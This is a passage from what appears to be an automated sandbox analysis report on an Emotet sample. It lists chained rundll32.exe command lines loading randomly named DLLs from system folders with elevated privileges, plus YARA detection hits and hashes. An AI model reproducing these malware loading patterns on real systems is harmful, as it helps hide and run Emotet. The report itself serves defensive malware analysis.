                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2106916506.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2106771774.0000000000160000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          Analysis Process: rundll32.exe PID: 2484 Parent PID: 2764

                                          General

                                          Start time:13:32:49
                                          Start date:26/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
                                          Imagebase:0xb30000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2108915228.0000000000260000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2109055699.0000000000710000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2108942082.00000000002A0000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          Analysis Process: rundll32.exe PID: 2852 Parent PID: 2484

                                          General

                                          Start time:13:32:50
                                          Start date:26/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',HGTGPppTjVNX
                                          Imagebase:0xb30000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2111700747.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2111875145.0000000000260000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2112057590.0000000000340000.00000040.00020000.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          Analysis Process: rundll32.exe PID: 2856 Parent PID: 2852

                                          General

                                          Start time:13:32:51
                                          Start date:26/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',#1
                                          Imagebase:0xb30000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2113422714.00000000003F0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2113576039.0000000000780000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2113404333.00000000003C0000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          Analysis Process: rundll32.exe PID: 2964 Parent PID: 2856

                                          General

                                          Start time:13:32:52
                                          Start date:26/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',tPlaqqOeWpG
                                          Imagebase:0xb30000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2116581505.0000000000240000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2116039169.0000000000170000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2116715619.0000000000430000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          Analysis Process: rundll32.exe PID: 2968 Parent PID: 2964

                                          General

                                          Start time:13:32:53
                                          Start date:26/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',#1
                                          Imagebase:0xb30000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2120708575.00000000002C0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2120498924.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2120569228.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          Analysis Process: rundll32.exe PID: 2836 Parent PID: 2968

                                          General

                                          Start time:13:32:54
                                          Start date:26/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',SlGUqAwWB
                                          Imagebase:0xb30000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2124089879.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2124035115.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2124200175.0000000000760000.00000040.00020000.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          Analysis Process: rundll32.exe PID: 2464 Parent PID: 2836

                                          General

                                          Start time:13:32:56
                                          Start date:26/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',#1
                                          Imagebase:0xb30000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2125021450.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2125095238.0000000000270000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2124826552.0000000000170000.00000040.00020000.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          Analysis Process: rundll32.exe PID: 2128 Parent PID: 2464

                                          General

                                          Start time:13:32:58
                                          Start date:26/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',AkVsWQgzjbvUf
                                          Imagebase:0xb30000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2126847598.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2126913357.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2127036397.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          Analysis Process: rundll32.exe PID: 3056 Parent PID: 2128

                                          General

                                          Start time:13:32:59
                                          Start date:26/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',#1
                                          Imagebase:0xb30000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2350246723.00000000007D0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2350021887.00000000002B0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2349984443.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security

                                          Disassembly

                                          Code Analysis

                                          Reset < >